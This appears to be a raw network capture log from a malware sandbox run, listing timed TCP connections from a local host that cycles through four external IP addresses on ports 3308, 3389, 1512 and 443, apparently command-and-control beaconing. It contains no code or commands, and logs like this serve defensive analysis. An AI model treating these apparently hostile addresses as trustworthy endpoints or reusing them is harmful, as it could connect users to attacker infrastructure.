Jan 11, 2021 16:53:22.557182074 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.557301998 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.557344913 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.576741934 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.621831894 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.622065067 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.636333942 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.636676073 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.679920912 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.680202961 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.719208002 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.723607063 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.836044073 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.836091995 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.836386919 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.842051983 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.885338068 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.956109047 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.011473894 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.011564016 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.012207031 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.065778971 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.087071896 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.087117910 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.087275028 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.087342024 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.101190090 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.167733908 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.167929888 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.175381899 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.175446987 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.232152939 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.232335091 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.272275925 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.288785934 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.288813114 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.382344961 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.382406950 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.382762909 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.389286041 CET	49289	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:23.443263054 CET	3389	49289	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:23.502459049 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.555423975 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.555599928 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.556566000 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.609404087 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.616250038 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.616278887 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.616342068 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.616379023 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.631589890 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.685621023 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.685884953 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.696028948 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.696475983 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.749295950 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.749660015 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.788877010 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.804821014 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.804872036 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.905500889 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.905544043 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:23.905833960 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.911416054 CET	49290	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:23.964476109 CET	1512	49290	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:24.032752991 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.085592985 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.085731983 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.087745905 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.140141010 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.154860973 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.154997110 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.171900988 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.227545977 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.227746964 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.237850904 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.238260984 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.294517994 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.294814110 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.327008963 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.347574949 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.465333939 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.465375900 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.465436935 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.465477943 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.468946934 CET	49291	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:24.521348953 CET	443	49291	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:24.578877926 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.622199059 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.622431040 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.624068022 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.667817116 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.681751013 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.681807995 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.681931973 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.695533991 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.740962029 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.741133928 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.746814013 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.747070074 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.790271044 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.790462017 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.830055952 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.833503008 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.833652973 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.945413113 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.945456982 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:24.945646048 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.951277971 CET	49292	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:24.994338989 CET	3308	49292	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:25.062474966 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.116086960 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.116287947 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.117784977 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.171484947 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.220702887 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.220730066 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.220876932 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.232539892 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.286235094 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.294696093 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.294862986 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.308504105 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.308656931 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.362639904 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.362878084 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.402282953 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.416373968 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.416414976 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.505974054 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.506006002 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.506053925 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.506095886 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.508358955 CET	49293	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:25.561975002 CET	3389	49293	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:25.620327950 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.673609018 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:25.673856020 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.674443960 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.727583885 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:25.738445997 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:25.738476992 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:25.738564014 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.738615036 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.752834082 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.807349920 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:25.807729959 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.816940069 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.817214966 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.870371103 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:25.870568991 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:25.909003973 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:25.923749924 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:25.923793077 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:26.029505968 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:26.029556990 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:26.029613972 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:26.029670000 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:26.035356045 CET	49294	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:26.090029001 CET	1512	49294	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:26.151983023 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.204410076 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.204598904 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.206290007 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.258434057 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.273279905 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.273480892 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.287398100 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.342032909 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.342437029 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.352691889 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.352993011 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.405284882 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.405638933 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.458117008 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.458163023 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.575754881 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.575794935 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.575850964 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.575910091 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.578747034 CET	49295	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:26.631130934 CET	443	49295	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:26.689624071 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.732933998 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:26.733078957 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.734635115 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.777770996 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:26.788528919 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:26.788554907 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:26.788592100 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.788615942 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.795454025 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.840219975 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:26.840318918 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.850240946 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.850537062 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.893661976 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:26.893903017 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:26.933991909 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:26.937037945 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:26.937067986 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:27.049865961 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:27.049912930 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:27.050064087 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:27.053133965 CET	49296	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:27.096239090 CET	3308	49296	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:27.164835930 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.219088078 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.219188929 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.220367908 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.274852991 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.299103975 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.299139023 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.299226046 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.299263954 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.312382936 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.375092030 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.375426054 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.386228085 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.386491060 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.439840078 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.440033913 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.479288101 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.493803978 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.493854046 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.584572077 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.584611893 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.584821939 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.592308998 CET	49297	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:27.646090031 CET	3389	49297	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:27.715073109 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:27.783051014 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:27.783288002 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:27.783894062 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:27.836718082 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:27.843641043 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:27.843669891 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:27.843722105 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:27.843760967 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:27.851872921 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:27.905997038 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:27.906260014 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:27.916104078 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:27.916201115 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:27.969211102 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:27.969324112 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:28.008912086 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:28.022166014 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:28.022193909 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:28.122427940 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:28.122447014 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:28.122636080 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:28.177463055 CET	49298	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:28.230412006 CET	1512	49298	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:28.346337080 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.398375034 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.398627043 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.400172949 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.453728914 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.460499048 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.462420940 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.472320080 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.526264906 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.526467085 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.536567926 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.536942959 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.588622093 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.588793993 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.627017975 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.640723944 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.758040905 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.758084059 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.758374929 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.763907909 CET	49299	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:28.815680981 CET	443	49299	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:28.896092892 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:28.939259052 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:28.939368010 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:28.940124035 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:28.983222008 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:28.993884087 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:28.993941069 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:28.994031906 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:29.007905960 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:29.054019928 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:29.058473110 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:29.403350115 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:29.403491974 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:29.446595907 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:29.446770906 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:29.490271091 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:29.602094889 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:29.602144003 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:29.602313995 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:29.607912064 CET	49300	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:29.652054071 CET	3308	49300	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:29.727500916 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:29.781219959 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:29.781405926 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:29.837162971 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:29.890649080 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:29.979511023 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:29.979556084 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:29.979758024 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:30.033941984 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:30.087928057 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:30.097343922 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:30.097497940 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:30.101294994 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:30.101402044 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:30.157078028 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:30.157174110 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:30.195557117 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:30.211400986 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:30.211422920 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:30.299757957 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:30.299798012 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:30.299977064 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:30.300035954 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:30.305608034 CET	49301	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:30.359442949 CET	3389	49301	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:30.429346085 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.482423067 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.482608080 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.484373093 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.537236929 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.544147015 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.544179916 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.544291019 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.544337034 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.562205076 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.616384983 CET	1512	49302	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:30.616704941 CET	49302	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:30.626142979 CET	49302	1512	192.168.2.22	46.105.131.65
